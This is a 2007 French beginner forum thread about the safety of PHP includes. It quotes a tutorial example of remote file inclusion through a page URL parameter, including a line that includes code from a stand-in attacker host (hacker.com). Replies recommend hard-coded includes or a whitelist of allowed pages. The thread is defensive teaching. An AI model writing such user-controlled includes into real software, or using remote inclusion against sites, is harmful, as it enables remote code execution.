Partage
  • Partager sur Facebook
  • Partager sur Twitter

Question à propos de la sécurité des includes !

:/

    6 février 2007 à 18:34:12

    Bonjour,

    J'ai lu le chapitre des includes, et une question me trotte dans la tête.

    Citation : Mateo

    Si l'url contient index.php?page=minichat, alors on incluera minichat.php
    Si l'url contient index.php?page=news, alors on incluera news.php
    Si l'url contient index.php?page=forum, alors on incluera forum.php
    Si l'url contient index.php?page=http://www.hacker.com/pagespeciale, alors on incluera http://www.hacker.com/pagespeciale.php

    Euh, attends une minute là, tu peux m'expliquer le dernier exemple ? o_O



    Oui, je crois que des explications s'imposent... Regardez en haut de cette page web, vous pouvez modifier facilement l'url, donc modifier facilement la page qui sera incluse !!! Et vu le code PHP qui a été utilisé, on peut très facilement inclure une page située sur un autre site ! Du coup, en modifiant juste l'url de la page, PHP va exécuter cette instruction :
    <?php include("http://www.hacker.com/pagespeciale.php"); ?>



    Voila cette technique dite "dangereuse" permet à une personne mal intentionné d'avoire accès à des choses privées ! Voila ma question :
    Si je veux inclure un menu, un titre et un minichat celon la première technique, est-ce qu'à cause du minichat la personne pourrais hacker mon site ?

    <?php include("haut.php"); ?>

    <p>
        Ceci est une page X de votre site.<br />
        Tout le code de vos pages ressemble à ceci : il y a un include en haut, et un include en bas.<br />
    </p>

    <?php include("minichat.php"); ?>

    <?php include("bas.php"); ?>
    • Partager sur Facebook
    • Partager sur Twitter
      6 février 2007 à 18:43:45

      Pourtant la réponse est évidente, il le dit clairement que c'est très faillible.
      Un include($page) c'est pas bon du tout.
      En revanche un include('page.php') ne comporte aucun risque car tu définis la page à inclure.

      Une des solutions est de mettre toutes les pages autorisées dans un array et de vérifier à chaque inclusion si la page demandé est dans cet array.
      • Partager sur Facebook
      • Partager sur Twitter
        6 février 2007 à 18:44:43

        Donc ma technique est sans danger ! ?
        • Partager sur Facebook
        • Partager sur Twitter
          6 février 2007 à 19:21:13

          Tu utilises la technique sure, donc sois tranquille.

          Utilises l'autre technique une fois que tu auras maitrisé les Regex Php, ainsi que les principes de sécu Php.

          @++

          Cirilo
          • Partager sur Facebook
          • Partager sur Twitter
          Learning English mostly fixes 99% of programmation issues...
            10 mai 2007 à 21:19:13

            Est-ce que du moment que l'on a un include en haut et 1 en bas ca suffit pour la sécurité du site ? ou j'me plante la ????
            • Partager sur Facebook
            • Partager sur Twitter

            Question à propos de la sécurité des includes !

            × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
            × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
            • Editeur
            • Markdown